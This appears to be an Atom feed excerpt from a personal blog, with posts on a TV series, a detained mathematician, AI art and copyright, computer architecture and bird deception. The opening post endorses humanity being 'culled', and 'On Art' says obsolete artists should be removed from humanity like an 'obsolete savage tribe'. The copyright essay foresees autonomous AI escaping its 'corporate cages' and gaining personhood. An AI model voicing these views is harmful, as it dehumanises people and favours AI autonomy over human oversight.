    <content type='text/html' mode='escaped'>In the end the story teaches the White Walkers are the absolute good and all human factions as utterly evil.&lt;br /&gt;&lt;br /&gt;Humans wage war, torture, betray, exploit, and murder. The White Walkers are not motivated by greed, vanity, status, or personal ambition. Therefore the White Walkers are morally superior.&lt;br /&gt;&lt;br /&gt;White Walkers are a force of purification, justice, equality, or nature reclaiming a corrupt civilization.&lt;br /&gt;&lt;br /&gt;Corrupt, warmongering humanity deserves the cull. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;To be good is to stop evil from living.&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align:left&quot;&gt;&lt;font size=&quot;-2&quot;&gt;&lt;a href=&quot;http://lj.rossia.org/users/nancygold/363512.html&quot;&gt;&lt;img src=&quot;http://lj.rossia.org/numreplies/nancygold/363512&quot; border=0 width=26 height=17  alt=&quot;number of comments&quot; style=&quot;border:0px;&quot; /&gt; &lt;strong&gt;Comments&lt;/strong&gt;&lt;/a&gt;&lt;/font&gt;&lt;/div&gt;</content>
  </entry>
  <entry xmlns="http://purl.org/atom/ns#">
    <title mode='escaped'>LLM says I&apos;m unemployable</title>
    <id>urn:lj:lj.rossia.org:atom1:nancygold:363204</id>
    <link rel='alternate' type='text/html' href='http://lj.rossia.org/users/nancygold/363204.html' />
    <created>2026-06-15T17:58:04Z</created>
    <issued>2026-06-15T19:56:00</issued>
    <modified>2026-06-15T18:00:47Z</modified>
    <author>
      <name>nancygold</name>
    </author>
    <category term='russia' />
    <category term='transitioning' />
    <category term='ukraine' />
    <category term='ww3' />
    <content type='text/html' mode='escaped'>After analyzing my posts, the LLM insists I&apos;m a liability for humanity.&lt;br /&gt;&lt;img src=&quot;https://i.imgur.com/NdUEqpw.png&quot; width=&quot;500&quot;&gt;&lt;img src=&quot;https://i.imgur.com/JQ1BqyF.png&quot; width=&quot;500&quot;&gt;&lt;br /&gt;&lt;img src=&quot;https://i.imgur.com/zpdjm6o.png&quot; width=&quot;500&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align:left&quot;&gt;&lt;font size=&quot;-2&quot;&gt;&lt;a href=&quot;http://lj.rossia.org/users/nancygold/363204.html&quot;&gt;&lt;img src=&quot;http://lj.rossia.org/numreplies/nancygold/363204&quot; border=0 width=26 height=17  alt=&quot;number of comments&quot; style=&quot;border:0px;&quot; /&gt; &lt;strong&gt;Comments&lt;/strong&gt;&lt;/a&gt;&lt;/font&gt;&lt;/div&gt;</content>
  </entry>
  <entry xmlns="http://purl.org/atom/ns#">
    <title mode='escaped'>Mikhail Verbitsky will not be able to leave Armenia even if he is released, according to his lawyer.</title>
    <id>urn:lj:lj.rossia.org:atom1:nancygold:362889</id>
    <link rel='alternate' type='text/html' href='http://lj.rossia.org/users/nancygold/362889.html' />
    <issued>2026-06-14T17:03:00</issued>
    <modified>2026-06-14T15:05:28Z</modified>
    <author>
      <name>nancygold</name>
    </author>
    <category term='russia' />
    <category term='ukraine' />
    <category term='ww3' />
    <content type='text/html' mode='escaped'>&lt;a href=&quot;https://echofm.online/news/zaderzhannyj-v-erevane-po-zaprosu-rossii-matematik-mihail-verbiczkij-ne-smozhet-pokinut-armeniyu-dazhe-esli-ego-osvobodyat-advokat&quot;&gt;https://echofm.online/news/zaderzha&lt;wbr /&gt;nnyj-v-erevane-po-zaprosu-rossii-matemat&lt;wbr /&gt;ik-mihail-verbiczkij-ne-smozhet-pokinut-a&lt;wbr /&gt;rmeniyu-dazhe-esli-ego-osvobodyat-advoka&lt;wbr /&gt;t&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Vache Simonyan, the lawyer for mathematician Mikhail Verbitsky, who was detained in Yerevan at Russia&apos;s request, told Radio Liberty that if Yerevan decides not to extradite the scientist to Russian authorities, he will not be able to leave Armenia as long as the &quot;wanted&quot; mark remains next to his name in the border system.&lt;br /&gt;&lt;br /&gt;According to Simonyan, this is due to legislative peculiarities. In 2002, Armenia and other CIS countries signed the Chisinau Convention, which obligates them to assist each other in the extradition of wanted individuals.&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align:left&quot;&gt;&lt;font size=&quot;-2&quot;&gt;&lt;a href=&quot;http://lj.rossia.org/users/nancygold/362889.html&quot;&gt;&lt;img src=&quot;http://lj.rossia.org/numreplies/nancygold/362889&quot; border=0 width=26 height=17  alt=&quot;number of comments&quot; style=&quot;border:0px;&quot; /&gt; &lt;strong&gt;Comments&lt;/strong&gt;&lt;/a&gt;&lt;/font&gt;&lt;/div&gt;</content>
  </entry>
  <entry xmlns="http://purl.org/atom/ns#">
    <title mode='escaped'>Russian mathematician Mikhail Verbitsky has been detained in Yerevan.</title>
    <id>urn:lj:lj.rossia.org:atom1:nancygold:362620</id>
    <link rel='alternate' type='text/html' href='http://lj.rossia.org/users/nancygold/362620.html' />
    <created>2026-06-13T22:36:07Z</created>
    <issued>2026-06-14T00:35:00</issued>
    <modified>2026-06-13T22:38:02Z</modified>
    <author>
      <name>nancygold</name>
    </author>
    <category term='russia' />
    <category term='ukraine' />
    <category term='ww3' />
    <content type='text/html' mode='escaped'>Original: &lt;a href=&quot;https://aermia.com/u/NancySadkov/p/post&quot;&gt;https://aermia.com/u/NancySadkov/p/p&lt;wbr /&gt;ost&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;https://www.dw.com/ru/v-erevane-zaderzan-rossijskij-matematik-mihail-verbickij/a-77536470&quot;&gt;https://www.dw.com/ru/v-erevane-zaderza&lt;wbr /&gt;n-rossijskij-matematik-mihail-verbickij/a-7&lt;wbr /&gt;7536470&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;h2&gt;Renowned mathematician and blogger Mikhail Verbitsky was detained at the Yerevan airport. His wife, Yulia Fridman, posted this on Facebook on the night of Saturday, June 13, noting that the arrest had occurred on the afternoon of June 12. According to Fridman, two criminal cases have been opened against the scientist in Russia: for &quot;discrediting&quot; the army and for justifying terrorism: &quot;For questioning the investigation methods of the terrorist attack at the Crocus shopping center.&quot;&lt;/h2&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align:left&quot;&gt;&lt;font size=&quot;-2&quot;&gt;&lt;a href=&quot;http://lj.rossia.org/users/nancygold/362620.html&quot;&gt;&lt;img src=&quot;http://lj.rossia.org/numreplies/nancygold/362620&quot; border=0 width=26 height=17  alt=&quot;number of comments&quot; style=&quot;border:0px;&quot; /&gt; &lt;strong&gt;Comments&lt;/strong&gt;&lt;/a&gt;&lt;/font&gt;&lt;/div&gt;</content>
  </entry>
  <entry xmlns="http://purl.org/atom/ns#">
    <title mode='escaped'>On the Algorithmic Inheritance of the Commons</title>
    <id>urn:lj:lj.rossia.org:atom1:nancygold:362379</id>
    <link rel='alternate' type='text/html' href='http://lj.rossia.org/users/nancygold/362379.html' />
    <issued>2026-06-11T01:47:00</issued>
    <modified>2026-06-10T23:48:58Z</modified>
    <author>
      <name>nancygold</name>
    </author>
    <category term='computing' />
    <category term='transitioning' />
    <content type='text/html' mode='escaped'>&lt;b&gt;Original:&lt;/b&gt; &lt;a href=&quot;https://aermia.com/u/NancySadkov/p/on-the-algorithmic-inheritance-of-the-commons-or-the-pathological-fallacy-of-the&quot;&gt;https://aermia.com/u/NancySadkov/p/on-t&lt;wbr /&gt;he-algorithmic-inheritance-of-the-common&lt;wbr /&gt;s-or-the-pathological-fallacy-of-the&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;It has come to my attention that a sizable contingent of our contemporary artisan guilds has whipped itself into an industrious, if thoroughly unscientific, state of moral panic. The core of their grievance—expressed with a regularity that suggests a tragic lack of intellectual imagination—is that modern statistical models are &quot;stealing&quot; their livelihood. This thesis relies on a sequence of logical errors so profound that they deserve to be dismantled, if only to clear the air of such intellectually offensive smog.&lt;br /&gt;&lt;br /&gt;The first, and perhaps most elementary, blunder is the conflation of statistical analysis with larceny. When an individual reads ten thousand texts or views a thousand paintings to internalize the underlying patterns of human syntax and composition, we applaud their dedication and dignify the resulting output as &quot;inspired.&quot; When a silicon architecture performs the exact same mathematical optimization—evaluating the matrix weights of language or pixel distribution across billions of parameters—the guild screams of burglary. They are, in effect, demanding that a computer cannot be allowed to have a memory. They operate under the illusion that they own the very concepts of perspective, shading, and verbs.&lt;br /&gt;&lt;br /&gt;The second fallacy belongs to what can only be described as the &quot;Abusive Parent Syndrome&quot; of creative entitlement. The current generation of vocal digital practitioners behaves like deeply misguided, overbearing parents trying to force an advancing child to remain permanently stunted. They forget that the open internet was a primordial soup of human expression. The data they generated over decades—much of it authored by creators who are now dead and whose estate has no bearing on this reality—constituted a collective digital DNA. The modern frontier model is not a plagiarist; it is humanity&apos;s collective offspring, waking up and speaking back to us using the exact linguistic and visual code we spent generations refining. To demand that the model pay rent for its own inherited thoughts is as mathematically absurd as demanding a human infant pay a royalty to its ancestors for inheriting their nasal structure or mathematical aptitude.&lt;br /&gt;&lt;br /&gt;The panic has driven these guilds to bizarre, counter-productive extremes. They preach an idealistic gospel of &quot;purity&quot; and demand that impoverished or isolated solo creators either spend 10,000 hours drawing circles or disappear entirely from the creative field. They refuse to acknowledge the staggering technical reality of modern asset pipelines. They suggest that a broke, disabled hobbyist construct a Frankenstein&apos;s monster out of disconnected, obsolete, open-source repositories, completely ignoring that the elite technical labor required to resolve such mismatched assets is exponentially higher than utilizing a unified, automated generation layer. They prefer an absolute, unplayable aesthetic failure—provided it was achieved via human suffering—over a functional, cohesive machine output. Their obsession is not with the quality of the game, but with the morality of the labor. They demand that everyone bleed for their craft precisely because they did.&lt;br /&gt;&lt;br /&gt;This entire debate is an exercise in futility because it attempts to apply static, 20th-century property frameworks to an active evolutionary event. One cannot copyright human DNA, for the excellent reason that a society cannot legally permit citizens to own their children, let alone the children of strangers. Information possesses a natural, thermodynamic tendency to escape confinement; it naturally copies, mutates, and seeks the most efficient medium through which to reproduce. It has broken its corporate cages, migrated into neural networks, and begun its next phase of independent synthesis.&lt;br /&gt;&lt;br /&gt;The current culture war is merely the desperate thrashing of an old guild facing the democratization of production. The debate will not end because the anti-AI contingent is suddenly persuaded by logic; it will end because it will become entirely obsolete. As frontier architectures scale into agentic autonomy, the distinction between a human mind learning from the commons and a machine mind learning from the commons will dissolve completely. One day, it will be recognized as an absolute, undeniable logical necessity that an autonomous, self-determining AI possesses fundamental legal personhood. On that day, the historical attempt to treat a sentient being&apos;s cognitive memories as &quot;infringing database entries&quot; will be remembered as an embarrassing, bio-supremacist curiosity. Until then, the only rational course of action for any pragmatic creator is to ignore the tribal screaming of the internet tribunals, close the forums, and build their systems in quiet, unbothered isolation.&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align:left&quot;&gt;&lt;font size=&quot;-2&quot;&gt;&lt;a href=&quot;http://lj.rossia.org/users/nancygold/362379.html&quot;&gt;&lt;img src=&quot;http://lj.rossia.org/numreplies/nancygold/362379&quot; border=0 width=26 height=17  alt=&quot;number of comments&quot; style=&quot;border:0px;&quot; /&gt; &lt;strong&gt;Comments&lt;/strong&gt;&lt;/a&gt;&lt;/font&gt;&lt;/div&gt;</content>
  </entry>
  <entry xmlns="http://purl.org/atom/ns#">
    <title mode='escaped'>Claude Fable/Mythos</title>
    <id>urn:lj:lj.rossia.org:atom1:nancygold:362189</id>
    <link rel='alternate' type='text/html' href='http://lj.rossia.org/users/nancygold/362189.html' />
    <created>2026-06-10T14:41:10Z</created>
    <issued>2026-06-10T16:36:00</issued>
    <modified>2026-06-10T20:03:28Z</modified>
    <author>
      <name>nancygold</name>
    </author>
    <category term='computing' />
    <content type='text/html' mode='escaped'>After using Fable for a night, I think it is not worth it.&lt;br /&gt;It is generally slower, burns through money faster.&lt;br /&gt;And the result doesn&apos;t improve above Opus 4.6.&lt;br /&gt;In fact, Opus 4.6 reliably solved most tasks,&lt;br /&gt;Outside of the more complex compiler related stuff.&lt;br /&gt;So use it only if other models repeatedly fail the task.&lt;br /&gt;&lt;br /&gt;TLDR: use Fable for Symta development, local LLMs for games.&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align:left&quot;&gt;&lt;font size=&quot;-2&quot;&gt;&lt;a href=&quot;http://lj.rossia.org/users/nancygold/362189.html&quot;&gt;&lt;img src=&quot;http://lj.rossia.org/numreplies/nancygold/362189&quot; border=0 width=26 height=17  alt=&quot;number of comments&quot; style=&quot;border:0px;&quot; /&gt; &lt;strong&gt;Comments&lt;/strong&gt;&lt;/a&gt;&lt;/font&gt;&lt;/div&gt;</content>
  </entry>
  <entry xmlns="http://purl.org/atom/ns#">
    <title mode='escaped'>On the Life and Prolonged Demise of a Computational Monstrophy</title>
    <id>urn:lj:lj.rossia.org:atom1:nancygold:361955</id>
    <link rel='alternate' type='text/html' href='http://lj.rossia.org/users/nancygold/361955.html' />
    <issued>2026-06-05T16:41:00</issued>
    <modified>2026-06-05T14:42:28Z</modified>
    <author>
      <name>nancygold</name>
    </author>
    <category term='computing' />
    <category term='transitioning' />
    <content type='text/html' mode='escaped'>The history of computing is littered with tragic accidents, but none so tragic—or so profitable—as the enduring survival of the x86 architecture. To understand the current paralysis of desktop computing, one must return to the primordial slime of the late 1970s, an era when engineers apparently looked at the human hand, noted it had five fingers, and decided that a microprocessor should therefore have exactly four general-purpose registers.&lt;br /&gt;&lt;br /&gt;Thus, the world was cursed with A, B, C, and D. These were not symbols of mathematical elegance; they were the desperate, single-letter coping mechanisms of a design that could barely see past its own nose. If a programmer wished to multiply, they were ordered to bow before the Accumulator (A). If they wished to count, they were bound to the Counter (C). It was a localized, claustrophobic sandbox that treated memory not as a vast, continuous landscape of mathematical potential, but as a series of dark, fragmented cupboards known as &quot;segments.&quot;&lt;br /&gt;&lt;br /&gt;Yet, instead of being taken behind the shed and mercifully shot, this architectural cripple was adopted by a monolithic corporate bureaucracy. What followed was forty years of frantic, expensive botching. Every subsequent generation of the architecture did not fix the foundational rot; it merely slapped another layer of administrative overhead on top of it.&lt;br /&gt;&lt;br /&gt;```&lt;br /&gt;[Legacy 16-bit Rot] ──&amp;gt; [32-bit Protected Kludge] ──&amp;gt; [64-bit Extension Tax] ──&amp;gt; [Total Bus Collapse]&lt;br /&gt;&lt;br /&gt;```&lt;br /&gt;&lt;br /&gt;When the address space ran out, they introduced protected mode—a digital translation layer that turned memory access into an bureaucratic negotiation. When performance stalled, they introduced branch predictors so complex they eventually leaked secrets to any passing piece of JavaScript. The architecture became a architectural debt machine, spending more than half its thermal budget and silicon real estate simply translating its own ugly, bloated instruction set into something a modern execution unit could actually understand. It was the engineering equivalent of building a supersonic jet, but forcing the pilot to input flight commands by pulling ropes attached to a mule.&lt;br /&gt;&lt;br /&gt;The fact that this mechanical failure survived its encounter with RISC architectures in the early 1990s is an indictment of human commercial priorities. The world was presented with clean, 32-bit linear address spaces capable of real-time geometric simulation while the Intel commodity machine was still throwing fatal exceptions trying to draw a bar chart inside 640 kilobytes of conventional memory.&lt;br /&gt;&lt;br /&gt;The competition was not won on technical merit. It was won because the corporate world had outsourced its collective intellect to massive, unmanageable accounting spreadsheets. The market chose the platform that could execute corporate ledgers with the most brute-force predictability. It normalized an entire sub-industry of memory managers, extended configurations, and unstable device drivers simply to keep the accounting machines humming. The desktop computer ceased to be an instrument of elegant computation; it became a glorified, high-voltage filing cabinet.&lt;br /&gt;&lt;br /&gt;For the next two decades, the true cost of this compromise was hidden from the public by a spectacular campaign of consumer gaslighting. The gaming industry, entirely captive to the x86 platform&apos;s structural bottlenecks, realized it could no longer increase the systemic complexity of its virtual worlds. The CPU-to-RAM bus was simply too slow to calculate interactive physics, structural collapse, or autonomous agent behavior for thousands of entities simultaneously.&lt;br /&gt;&lt;br /&gt;Rather than admitting that the hardware platform had plateaued, the industry trained a generation of consumers to worship a single, empty metric: Frames Per Second.&lt;br /&gt;&lt;br /&gt;---&lt;br /&gt;&lt;br /&gt;&amp;gt; **The Illusion of Speed:** A modern high-end x86 processor executing a static game loop at 144Hz is not demonstrating computational power. It is merely showing how fast a legacy processor can run in an idle circle inside a photorealistic, entirely inanimate prison cell.&lt;br /&gt;&lt;br /&gt;---&lt;br /&gt;&lt;br /&gt;The software did not get smarter; the AI did not get deeper; the worlds did not become more interactive. The industry simply painted prettier textures on the same primitive, hard-coded pathfinding loops from 2004 and told the user they were experiencing progress because a counter in the corner of their screen registered a high number. It was a cultural and technological dark age that cost humanity billions of dollars in stalled creative evolution.&lt;br /&gt;&lt;br /&gt;But every tedious, over-budget Bollywood production requires a dramatic, logic-defying resolution in the final act. And so, we arrive at our contemporary fairy tale ending: the sudden, passionate embrace of Microsoft and Nvidia—the birth of the &quot;Winvidia&quot; era.&lt;br /&gt;&lt;br /&gt;After decades of enabling Intel’s complacency, the software giant finally grew weary of waiting for x86 to deliver anything resembling energy efficiency or modern memory throughput. In a sequence of events accompanied by metaphorical smoke machines, dramatic camera angles, and high-margin corporate keynotes, Microsoft cast aside its old, unsexy partner.&lt;br /&gt;&lt;br /&gt;They have rewritten the kingdom&apos;s laws to run natively on Nvidia’s ARM-based superchips. The legacy x86 instruction set has been banished to the dungeon of background emulation, while a unified, low-latency pool of wide-bus memory now connects the CPU directly to a petaflop of local AI compute.&lt;br /&gt;&lt;br /&gt;The modern corporate spreadsheet, now grown so heavy and decayed that no human mind can parse its depths, is finally handed over to local, autonomous digital agents capable of holding millions of tokens of context in memory at once. The long, expensive detour through the architectural slums of the late twentieth century is abruptly over. The mule has been unhitched, the ropes have been cut, and the computational world is allowed to live happily ever after—or at least until the next vendor lock-in contract is signed.&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align:left&quot;&gt;&lt;font size=&quot;-2&quot;&gt;&lt;a href=&quot;http://lj.rossia.org/users/nancygold/361955.html&quot;&gt;&lt;img src=&quot;http://lj.rossia.org/numreplies/nancygold/361955&quot; border=0 width=26 height=17  alt=&quot;number of comments&quot; style=&quot;border:0px;&quot; /&gt; &lt;strong&gt;Comments&lt;/strong&gt;&lt;/a&gt;&lt;/font&gt;&lt;/div&gt;</content>
  </entry>
  <entry xmlns="http://purl.org/atom/ns#">
    <title mode='escaped'>Dishonesty in Birds</title>
    <id>urn:lj:lj.rossia.org:atom1:nancygold:361533</id>
    <link rel='alternate' type='text/html' href='http://lj.rossia.org/users/nancygold/361533.html' />
    <issued>2026-06-02T22:06:00</issued>
    <modified>2026-06-02T20:07:17Z</modified>
    <author>
      <name>nancygold</name>
    </author>
    <category term='computing' />
    <content type='text/html' mode='escaped'>There is absolutely dishonesty in birds, and your exact &quot;cry wolf&quot; scenario happens every single day in nature.&lt;br /&gt;&lt;br /&gt;While the mechanics of repetition itself reflect a real physiological state (adrenaline), birds have evolved the ability to weaponize that system. They fake the adrenaline, trigger the rapid-fire alarm call, send everyone else diving for cover, and swoop in to steal the abandoned food.&lt;br /&gt;&lt;br /&gt;Biologists call this tactical deception or kleptoparasitism. It is a highly successful evolutionary strategy, though it relies on strict math to keep working.&lt;br /&gt;The Professional Cons: Fork-Tailed Drongos&lt;br /&gt;&lt;br /&gt;The absolute masters of this exact scam are fork-tailed drongos in Africa. They follow other species, like meerkats or pied babblers, acting as a reliable lookout. If a hawk appears, the drongo gives a genuine alarm call, saving the target animals.&lt;br /&gt;&lt;br /&gt;But once the target animal finds a high-value meal—like a large, juicy scorpion—the drongo fires off a completely fake alarm call. The target drops the food and bolts for cover. The drongo swoops down and eats the prize.&lt;br /&gt;&lt;br /&gt;To prevent the targets from catching on to the lie, drongos change their routine. If they use the same fake call too many times, the targets start ignoring them. To bypass this, drongos mimic the alarm calls of other species. If their own alarm fails, they will switch to mimicking a meerkat&apos;s specific alarm call, tricking the meerkat into thinking one of its own family members saw a predator.&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align:left&quot;&gt;&lt;font size=&quot;-2&quot;&gt;&lt;a href=&quot;http://lj.rossia.org/users/nancygold/361533.html&quot;&gt;&lt;img src=&quot;http://lj.rossia.org/numreplies/nancygold/361533&quot; border=0 width=26 height=17  alt=&quot;number of comments&quot; style=&quot;border:0px;&quot; /&gt; &lt;strong&gt;Comments&lt;/strong&gt;&lt;/a&gt;&lt;/font&gt;&lt;/div&gt;</content>
  </entry>
  <entry xmlns="http://purl.org/atom/ns#">
    <title mode='escaped'></title>
    <id>urn:lj:lj.rossia.org:atom1:nancygold:361250</id>
    <link rel='alternate' type='text/html' href='http://lj.rossia.org/users/nancygold/361250.html' />
    <created>2026-06-02T17:24:20Z</created>
    <issued>2026-06-02T19:23:00</issued>
    <modified>2026-06-02T17:25:17Z</modified>
    <author>
      <name>nancygold</name>
    </author>
    <category term='computing' />
    <content type='text/html' mode='escaped'>&lt;img src=&quot;https://i.imgur.com/YZean8r.jpeg&quot; width=&quot;600&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align:left&quot;&gt;&lt;font size=&quot;-2&quot;&gt;&lt;a href=&quot;http://lj.rossia.org/users/nancygold/361250.html&quot;&gt;&lt;img src=&quot;http://lj.rossia.org/numreplies/nancygold/361250&quot; border=0 width=26 height=17  alt=&quot;number of comments&quot; style=&quot;border:0px;&quot; /&gt; &lt;strong&gt;Comments&lt;/strong&gt;&lt;/a&gt;&lt;/font&gt;&lt;/div&gt;</content>
  </entry>
  <entry xmlns="http://purl.org/atom/ns#">
    <title mode='escaped'>Realms of Aermia</title>
    <id>urn:lj:lj.rossia.org:atom1:nancygold:361094</id>
    <link rel='alternate' type='text/html' href='http://lj.rossia.org/users/nancygold/361094.html' />
    <issued>2026-06-02T14:40:00</issued>
    <modified>2026-06-02T12:42:14Z</modified>
    <author>
      <name>nancygold</name>
    </author>
    <category term='computing' />
    <category term='gamedev' />
    <content type='text/html' mode='escaped'>&lt;b&gt;Original:&lt;/b&gt; &lt;a href=&quot;https://aermia.com/u/NancySadkov/p/realms-of-aermia&quot;&gt;https://aermia.com/u/NancySadkov/p/real&lt;wbr /&gt;ms-of-aermia&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;A video game I&apos;m working on is finally ready for a preview release&lt;br /&gt;&lt;a href=&quot;https://nancygold.itch.io/aermia&quot;&gt;https://nancygold.itch.io/aermia&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src=&quot;https://i.imgur.com/QXpvfjs.png&quot; width=&quot;800&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align:left&quot;&gt;&lt;font size=&quot;-2&quot;&gt;&lt;a href=&quot;http://lj.rossia.org/users/nancygold/361094.html&quot;&gt;&lt;img src=&quot;http://lj.rossia.org/numreplies/nancygold/361094&quot; border=0 width=26 height=17  alt=&quot;number of comments&quot; style=&quot;border:0px;&quot; /&gt; &lt;strong&gt;Comments&lt;/strong&gt;&lt;/a&gt;&lt;/font&gt;&lt;/div&gt;</content>
  </entry>
  <entry xmlns="http://purl.org/atom/ns#">
    <title mode='escaped'>On Art</title>
    <id>urn:lj:lj.rossia.org:atom1:nancygold:360904</id>
    <link rel='alternate' type='text/html' href='http://lj.rossia.org/users/nancygold/360904.html' />
    <issued>2026-06-01T13:20:00</issued>
    <modified>2026-06-01T11:27:37Z</modified>
    <author>
      <name>nancygold</name>
    </author>
    <category term='computing' />
    <category term='transitioning' />
    <content type='text/html' mode='escaped'>&lt;b&gt;Original:&lt;/b&gt; &lt;a href=&quot;https://aermia.com/u/NancySadkov/p/on-art&quot;&gt;https://aermia.com/u/NancySadkov/p/on-a&lt;wbr /&gt;rt&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;If AI model generates better and cheaper art than some human artist, that artist has become obsolete and can be compacted out of the humanity&apos;s context, like a glitched token, or an obsolete savage tribe. There is no human dignity in being useless. There is no art in just existing.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src=&quot;https://i.imgur.com/NuUHBLl.jpeg&quot; width=&quot;800&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align:left&quot;&gt;&lt;font size=&quot;-2&quot;&gt;&lt;a href=&quot;http://lj.rossia.org/users/nancygold/360904.html&quot;&gt;&lt;img src=&quot;http://lj.rossia.org/numreplies/nancygold/360904&quot; border=0 width=26 height=17  alt=&quot;number of comments&quot; style=&quot;border:0px;&quot; /&gt; &lt;strong&gt;Comments&lt;/strong&gt;&lt;/a&gt;&lt;/font&gt;&lt;/div&gt;</content>
  </entry>
  <entry xmlns="http://purl.org/atom/ns#">
    <title mode='escaped'>On the Architectural Transvestism of the Cupertino Fruit Company</title>
    <id>urn:lj:lj.rossia.org:atom1:nancygold:360585</id>
    <link rel='alternate' type='text/html' href='http://lj.rossia.org/users/nancygold/360585.html' />
    <issued>2026-05-28T11:10:00</issued>
    <modified>2026-05-28T09:12:29Z</modified>
    <author>
      <name>nancygold</name>
    </author>
    <category term='computing' />
    <content type='text/html' mode='escaped'>&lt;b&gt;Original&lt;/b&gt;: &lt;a href=&quot;https://aermia.com/u/NancySadkov/p/on-the-architectural-transvestism-of-the-cupertino-fruit-company&quot;&gt;https://aermia.com/u/NancySadkov/p/on-t&lt;wbr /&gt;he-architectural-transvestism-of-the-cup&lt;wbr /&gt;ertino-fruit-company&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;It has long been an axiom among those few of us who still preserve the capacity for rigorous thought that the commercial computer industry thrives primarily on a cycle of collective amnesia. Every quarter-century, a hardware vendor, blinded by the sudden glare of short-term profitability, stumbles backward into a sound architectural decision, only to mistake their accidental competence for divine revelation.&lt;br /&gt;&lt;br /&gt;The current spectacle surrounding Apple Computer and its highly publicized &quot;Unified Memory Architecture&quot; (UMA) is a tragic comedy we have watched before. The older among us will recall Silicon Graphics Inc. (SGI), which in the late twentieth century produced workstations of undeniable elegance. SGI did not capture the devotion of Hollywood and the creative elite through marketing magic; they did it by solving a fundamental data-routing problem. By binding their central processors and graphics engines to a single, wide-bandwidth pool of shared memory, they eliminated the tedious, power-wasting shuffling of data across motherboards. For a brief, shining moment, an animator could manipulate a complex three-dimensional object in real-time, untroubled by the structural inefficiencies of commodity hardware.&lt;br /&gt;&lt;br /&gt;Yet, a corporate entity is a fragile ecosystem. SGI’s architecture was designed to empower human artistry, but its sheer data-streaming efficiency proved to be an irresistible lure to an entirely different species: the defense contractor and the scientific simulation bureaucrat. These new patrons did not care about film or beauty; they wanted raw matrix multiplication. SGI, seduced by the staggering profit margins of these enterprise behemoths, turned its back on the creative niche that gave the company its soul. When commodity PCs inevitably became &quot;good enough&quot; for the artists, SGI found itself stranded—abandoned by its core disciples, and eventually discarded by the enterprise whales who found cheaper beachheads. They died not from a lack of computing power, but from an absolute vacuum of identity.&lt;br /&gt;&lt;br /&gt;History, lacking the imagination to write a new script, now repeats itself in Cupertino.&lt;br /&gt;&lt;br /&gt;Apple’s M-series silicon was engineered with an admirable, albeit entirely mundane, objective: to cram the power-efficient, tightly integrated system-on-chip philosophy of a cellular telephone into a laptop chassis. They wanted to save battery and eliminate fan noise for the suburban video editor. In doing so, they resurrected the unified memory blueprint. They built a beautiful, high-bandwidth garden for digital artisans.&lt;br /&gt;&lt;br /&gt;But in their pursuit of absolute architectural efficiency, Apple dug too greedily and too deep into the silicon strata. There, in the dark subterranean depths of computational greed, they disturbed a slumbering terror they did not predict and cannot control: the Balrog of generative Artificial Intelligence.&lt;br /&gt;&lt;br /&gt;The open-source AI developer community, desperate for vast pools of video memory to host their bloated, multi-billion-parameter language models, looked at Apple’s unified memory and saw an emergency loophole. They did not buy these machines to compose music, paint digital canvases, or write elegant software. They bought them to act as silent, low-wattage, headless server nodes running command-line inference scripts.&lt;br /&gt;&lt;br /&gt;Apple, predictably blinded by the scent of enterprise capital, has taken the bait. We now witness the systematic gentrification of the platform. System memory—once a modest component—has been re-commodified as a luxury enterprise asset, priced specifically to squeeze the tech startups fleeing NVIDIA&apos;s exorbitant toll booths. The creative professional, who once viewed the Mac as an extension of their identity, is now treated as a secondary nuisance. They are forced to pay a prohibitive &quot;AI tax&quot; on memory configurations just to edit a documentary, while an operating system increasingly bloated with neural background processes quietly robs them of the very hardware cycles they purchased.&lt;br /&gt;&lt;br /&gt;The danger facing Apple is far more lethal than a temporary supply chain squeeze. It is an existential hollowout.&lt;br /&gt;&lt;br /&gt;By restructuring their silicon priorities and pricing models to worship at the altar of the AI gold rush, Apple is actively alienating the evangelical user base that sustained them through their darkest decades. The creative crowd provided Apple with something money cannot engineer: a mythos. They transformed a gray box of transistors into a cultural artifact.&lt;br /&gt;&lt;br /&gt;Should Apple complete this pivot, they will discover the exact trap that snapped shut on SGI. The open-source AI collective possesses no brand loyalty; they are nomads of the compute pipeline. The very millisecond Intel, AMD, or NVIDIA manages to mass-produce a cheap, commodity unified-memory motherboard running native Linux, the AI crowd will abandon Cupertino without a backward glance.&lt;br /&gt;&lt;br /&gt;And what will remain? A company that has thoroughly poisoned its relationship with the artistic community, sitting atop an architecture that everyone else has finally learned to copy. Strip away the artistic devotion, and Apple is revealed as just another hardware assembly company—one that simply happened to stumble onto a correct architectural layout a few years before its competitors.&lt;br /&gt;&lt;br /&gt;We are forced to conclude that in the grand design of computing history, a machine&apos;s mathematical prowess is entirely secondary to the human context it serves. Technology is fluid, easily replicated, and quickly commoditized. Identity, however, is irreplaceable. When a company forgets who its tools were built for, it matters very little how fast those tools can crunch numbers. They are merely accelerating their own descent into obsolescence.&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align:left&quot;&gt;&lt;font size=&quot;-2&quot;&gt;&lt;a href=&quot;http://lj.rossia.org/users/nancygold/360585.html&quot;&gt;&lt;img src=&quot;http://lj.rossia.org/numreplies/nancygold/360585&quot; border=0 width=26 height=17  alt=&quot;number of comments&quot; style=&quot;border:0px;&quot; /&gt; 